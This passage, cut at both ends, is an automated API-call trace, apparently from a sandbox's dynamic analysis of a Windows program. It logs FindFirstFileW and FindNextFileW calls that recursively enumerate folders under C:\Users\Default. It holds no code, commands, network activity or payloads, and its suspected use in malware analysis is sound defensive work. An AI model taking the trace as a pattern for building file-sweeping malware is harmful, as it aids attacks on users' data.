nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.830] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.830] lstrlenW (lpString="desktop.ini") returned 11 [0070.830] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x50b5f8, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d5d961, ftLastAccessTime.dwLowDateTime=0xe4e59850, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0xe4e59850, ftLastWriteTime.dwHighDateTime=0x1d5e05d, nFileSizeHigh=0x0, nFileSizeLow=0x16172, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="_VcR_2hx_Z Ysp_jG.flv", cAlternateFileName="_VCR_2~1.FLV")) returned 0xffffffff [0070.830] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0070.830] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0070.830] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.830] lstrlenW (lpString="My Pictures") returned 11 [0070.830] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x50b5f8, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d5d961, ftLastAccessTime.dwLowDateTime=0xe4e59850, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0xe4e59850, ftLastWriteTime.dwHighDateTime=0x1d5e05d, nFileSizeHigh=0x0, nFileSizeLow=0x16172, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="_VcR_2hx_Z Ysp_jG.flv", cAlternateFileName="_VCR_2~1.FLV")) returned 0xffffffff [0070.830] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0070.830] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0070.830] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.830] lstrlenW (lpString="My Videos") returned 9 [0070.830] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x50b5f8, ftCreationTime.dwLowDateTime=0x4e1368, ftCreationTime.dwHighDateTime=0x1d5d961, ftLastAccessTime.dwLowDateTime=0xe4e59850, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0xe4e59850, ftLastWriteTime.dwHighDateTime=0x1d5e05d, nFileSizeHigh=0x0, nFileSizeLow=0x16172, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="_VcR_2hx_Z Ysp_jG.flv", cAlternateFileName="_VCR_2~1.FLV")) returned 0xffffffff [0070.831] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0070.831] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0070.831] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.831] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.831] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0070.831] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.831] lstrlenW (lpString="Downloads") returned 9 [0070.832] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.832] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.832] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.832] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.832] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.832] lstrlenW (lpString="desktop.ini") returned 11 [0070.832] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.832] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0070.832] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0070.832] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.832] lstrlenW (lpString="Favorites") returned 9 [0070.832] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.900] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.900] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.900] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.900] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.900] lstrlenW (lpString="desktop.ini") returned 11 [0070.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0070.900] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.900] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.900] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfefb1330, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.900] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.901] lstrlenW (lpString="desktop.ini") returned 11 [0070.901] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0070.901] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0070.901] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0070.901] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.901] lstrlenW (lpString="Microsoft Websites") returned 18 [0070.901] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0070.946] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.946] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.946] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0070.946] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.946] lstrlenW (lpString="IE Add-on site.url") returned 18 [0070.961] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0070.961] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0070.961] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0070.961] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.961] lstrlenW (lpString="MSN Websites") returned 12 [0070.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0070.976] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.976] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.976] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0070.976] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.976] lstrlenW (lpString="MSN Autos.url") returned 13 [0070.977] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0070.977] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0070.977] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0070.977] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.977] lstrlenW (lpString="Windows Live") returned 12 [0070.977] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0070.981] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.004] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.004] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0071.004] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.004] lstrlenW (lpString="Get Windows Live.url") returned 20 [0071.004] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0071.023] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0071.023] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0071.023] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.023] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.023] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Links", cAlternateFileName="")) returned 1 [0071.023] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.023] lstrlenW (lpString="Links") returned 5 [0071.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0071.078] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.078] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.078] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.079] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.099] lstrlenW (lpString="desktop.ini") returned 11 [0071.099] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0071.117] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.117] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0071.117] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0071.117] lstrlenW (lpString="Local Settings") returned 14 [0071.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x4f0070 | out: lpFindFileData=0x4f0070*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4e1d88, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0071.117] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0070 | out: hHeap=0x4a0000) returned 1 [0071.117] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, 